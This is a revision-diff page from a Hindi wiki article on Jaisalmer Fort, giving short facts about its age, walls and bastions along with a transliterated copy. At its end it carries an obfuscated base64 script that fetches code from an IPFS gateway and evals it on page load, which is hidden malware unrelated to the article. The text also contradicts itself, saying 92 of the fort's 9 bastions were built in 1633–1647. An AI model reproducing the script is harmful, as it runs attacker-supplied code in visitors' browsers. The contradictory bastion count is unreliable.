Difference between revisions of "जैसलमेर क़िला"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('thumb|250px|जैसलमेर का क़िला, [[जैसलमेर<br />Jaisalmer F...' के साथ नया पन्ना बनाया)
 
Line 1: Line 1:
 
[[चित्र:Jaisalmer-Fort.jpg|thumb|250px|जैसलमेर का क़िला, [[जैसलमेर]]<br />Jaisalmer Fort, Jaisalmer]]
 
[[चित्र:Jaisalmer-Fort.jpg|thumb|250px|जैसलमेर का क़िला, [[जैसलमेर]]<br />Jaisalmer Fort, Jaisalmer]]
 
*[[जैसलमेर]] [[राजस्थान]] का सबसे ख़ूबसूरत शहर है और [[जैसलमेर पर्यटन]] का सबसे आकर्षक स्थल माना जाता है।  
 
*[[जैसलमेर]] [[राजस्थान]] का सबसे ख़ूबसूरत शहर है और [[जैसलमेर पर्यटन]] का सबसे आकर्षक स्थल माना जाता है।  
 +
*बारहवीं सदीं में सुनहरे पत्थरों से बना यह क़िला राजस्थान में दूसरा सबसे पुराना क़िला है और बड़ी संख्या में देशी विदेशी पर्यटक इसे देखने आते हैं।
 
*जैसलमेर के प्रमुख ऐतिहासिक स्मारकों में सर्वप्रमुख यहाँ का क़िला है।  
 
*जैसलमेर के प्रमुख ऐतिहासिक स्मारकों में सर्वप्रमुख यहाँ का क़िला है।  
*यह 1155 ई. में निर्मित हुआ था।  
+
*जैसलमेर का क़िला 1155 ई. में निर्मित हुआ था।  
*यह स्थापत्य का सुंदर नमूना है।  
+
*जैसलमेर के क़िला स्थापत्य का सुंदर नमूना है। इसमें बारह सौ घर हैं।
*इसमें बारह सौ घर हैं।
+
*जैसलमेर क़िले की अपनी ख़ासियत है, ढाई सौ फुट की ऊँचाई वाला यह क़िला तीस फुट ऊँची प्राचीरों से घिरा हुआ है।
 +
*जैसलमेर के क़िले में 9 बुर्ज बने हुए हैं जिनमें से 92 का निर्माण 1633 से 1647 के बीच कराया गया था।
 +
*ग़ौरतलब बात ये है कि जैसलमेर की पूरी आबादी इसी क़िले की चहारदीवारी के अंदर ही बसी हैं।<ref>
 +
{{cite web |url=http://www.bbc.co.uk/hindi/southasia/030530_fort_explosive_mk.shtml |title=जैसलमेर क़िला सील किया |accessmonthday=[[6 अक्टूबर]] |accessyear=[[2010]] |last= |first= |authorlink= |format= |publisher=बी बी सी |language=हिन्दी }}</ref>
 +
 
 
{{लेख प्रगति  
 
{{लेख प्रगति  
 
|आधार=
 
|आधार=
Line 12: Line 17:
 
|शोध=
 
|शोध=
 
}}
 
}}
 +
==टीका टिप्पणी और संदर्भ==
 +
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{राजस्थान के पर्यटन स्थल}}
 
{{राजस्थान के पर्यटन स्थल}}

Revision as of 06:55, 6 October 2010

[[chitr:Jaisalmer-Fort.jpg|thumb|250px|jaisalamer ka qila, jaisalamer
Jaisalmer Fort, Jaisalmer]]

  • jaisalamer rajasthan ka sabase khoobasoorat shahar hai aur jaisalamer paryatan ka sabase akarshak sthal mana jata hai.
  • barahavian sadian mean sunahare pattharoan se bana yah qila rajasthan mean doosara sabase purana qila hai aur b di sankhya mean deshi videshi paryatak ise dekhane ate haian.
  • jaisalamer ke pramukh aitihasik smarakoan mean sarvapramukh yahaan ka qila hai.
  • jaisalamer ka qila 1155 ee. mean nirmit hua tha.
  • jaisalamer ke qila sthapaty ka suandar namoona hai. isamean barah sau ghar haian.
  • jaisalamer qile ki apani khasiyat hai, dhaee sau phut ki ooanchaee vala yah qila tis phut ooanchi prachiroan se ghira hua hai.
  • jaisalamer ke qile mean 9 burj bane hue haian jinamean se 92 ka nirman 1633 se 1647 ke bich karaya gaya tha.
  • gauratalab bat ye hai ki jaisalamer ki poori abadi isi qile ki chaharadivari ke aandar hi basi haian.[1]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. jaisalamer qila sil kiya (hindi) bi bi si. abhigaman tithi: 6 aktoobar, 2010.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>